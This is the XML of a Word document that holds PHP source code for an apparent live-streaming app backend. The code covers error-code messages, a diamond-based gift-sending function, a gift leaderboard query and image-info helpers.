          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0E45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7977A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4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693B86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room password </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>非法</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA20F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034B72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5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006C48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roomName</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>非法</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5526BC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4A12F0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7:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A8A6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聊天室</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08129F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4D8538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8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC6C98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thirdRoomId</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072E89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1F5EC4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9:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11950A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人数已满</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBD1B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AC6E20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10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD94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控制房间流状态失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8B957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2EF182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0011:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02233A5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房间数超过上限</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户没有认证时会有该限制</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8144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262979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case 20013:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202E18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没有直播回看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23783F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73B96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001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240081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用户账户已过期</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428339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3F4890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003:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE59C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暂停服务</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA8D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040D2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004:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D180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appkey</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682B27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A9D07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005:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554272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旧密码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改密码时要做旧密码验证</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71254B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3EC6AB3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006:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A2C8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域名没有</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cname,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>自有域名绑定时要检查域名是否</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cname';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF25D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105A6A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4001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AB740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附件重复</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078F8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290C42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5002:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566CFF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点播视频上传失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA1496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C89FF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8001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B16A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图片上传失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B41FAF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D4487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8003:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492163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房间分享图片上传失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210265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40CA9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8005:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CBEE1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房间封面图片上传失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E79FD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690063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8007:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF289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主播室水印图片上传失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499337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9001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB843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直播记录</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0C73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37AC1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9002:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605984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无效的直播记录</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654105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3001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A866F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时间格式错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6274C4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34980D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4001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485853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导出文件上传文件服务器失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F980B2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4002:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F1A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导出文件生成中</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D3F51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5E6D1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5001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA4B9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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上传礼品图片失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7CEFE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5002:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200BEC4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text = '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>无效的礼品</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">id / </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除礼品图片失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047409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              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7292E1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efault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D131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ext = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6C88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1CAF1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9DDC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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>码：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$id.', '.$text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001F753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1E14B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liwu_money(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1B2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d         =   input('id/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAE275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_zhu    =   input('uid_zhu/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702962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d){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB372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id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453402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774395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_zhu){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D7523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主播</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7AA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4DCB8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_zhu == $this-&gt;member['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AC9A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不能给自己送礼物</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A0AA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8BB5AD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ember_zhibo_liwu = Db::name('member_zhibo_liwu')-&gt;cache(true)-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66986A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member_zhibo_liwu){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002887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id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>礼物已被删除，请重新打开</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>APP']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEDB31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2FC2C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his-&gt;member['zhibo_zuan'] || $this-&gt;member['zhibo_zuan'] &lt; $member_zhibo_liwu['money']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3128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钻石不足</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF95B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377C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this-&gt;member['id'])-&gt;setDec('zhibo_zuan', $member_zhibo_liwu['money']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B7413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member')-&gt;where('id', $uid_zhu)-&gt;setInc('zhibo_zuan', $member_zhibo_liwu['money']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684D5C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id']     =   $this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF005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uid_zhu'] =   $uid_zhu;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651AF41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money']   =   $member_zhibo_liwu['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561405B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liwu_id'] =   $id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592CA0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ap['time']    =   time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2022292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 = Db::name('member_zhibo_liwu_list')-&gt;insertGetId($map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59916B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3ADAA44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ret'=&gt;$db,'money'=&gt;$map['money']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DD18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6D0B593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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>礼物发送失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B4A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1FC6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2117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ublic function phb(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2099CE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 input('type/d') ? input('type/d') : 1;    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4787D7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 input('uid/d') ? input('uid/d') : 0; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415BE3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D39D5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err'=&gt;'uid</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB36F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4B6E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join   =   [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BBC5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__MEMBER__ b','a.uid = b.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29834D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D420A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599FCE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type == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BB84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d';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC49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2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671365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w';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E238A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 if($type == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647BBC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m';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0203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3A4955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e = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74C7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D16EF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_zhu']   =   $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB94E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ate){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBBD1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zhibo_liwu_list')-&gt;alias('a')-&gt;join($join)-&gt;where($where)-&gt;whereTime('time',$date)-&gt;field('sum(a.money) as money_num,b.id,b.nickname,b.mobile,b.img')-&gt;group('a.uid')-&gt;order('money_num desc')-&gt;limit(50)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335E6A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482EBF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 = Db::name('member_zhibo_liwu_list')-&gt;alias('a')-&gt;join($join)-&gt;where($where)-&gt;field('sum(a.money) as money_num,b.id,b.nickname,b.mobile,b.img')-&gt;group('a.uid')-&gt;order('money_num desc')-&gt;limit(50)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446F66A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0C25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foreach ($data as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B88E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v['nickname']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D87630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ata[$k]['nickname']   =   _username($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEE7B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1141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A1795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json($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BE86B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942F6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8FCDB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77BBD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712FC7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ajaxError($text=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5104D8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ext;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E277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80288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function getImageInfo($img) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04464A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7A610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info = getimagesize($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C5C23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witch ($img_info[2]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B7A37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1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6107325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type = "GIF";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C234E8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21898FB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2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355AB8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type = "JPG";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7462AE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8DCA4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ase 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13988D8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type = "PNG";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E79F5D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reak;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D920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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC987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type = $imgtype . "</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616B32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_size = ceil(filesize($img) / 1000) . "k"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68874FA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new_img_info = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A06F0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idth" =&gt; $img_info[0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67384D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height" =&gt; $img_info[1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760E9E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 =&gt; $img_type,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DBB3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ize" =&gt; $img_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7309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43D3C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 width";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3FBF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img_info[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049D98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 height";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEE2D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img_info[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485BE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 format";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F2EE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img_type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B4B9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 size";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B35D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img_size;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C32822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int $new_img_info;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B73A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85A8C2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imgHouZhui($img){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BE7E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strstr($img,'.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B17C84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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6BFE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2BFD140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lse{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F647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img=='.gif'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511A51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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AFD7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9EF8D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61F1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rue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1133CB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B0D5B3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yaoqing($uid,$s1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A71422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 || !$s1){</w:t>
      </w:r>
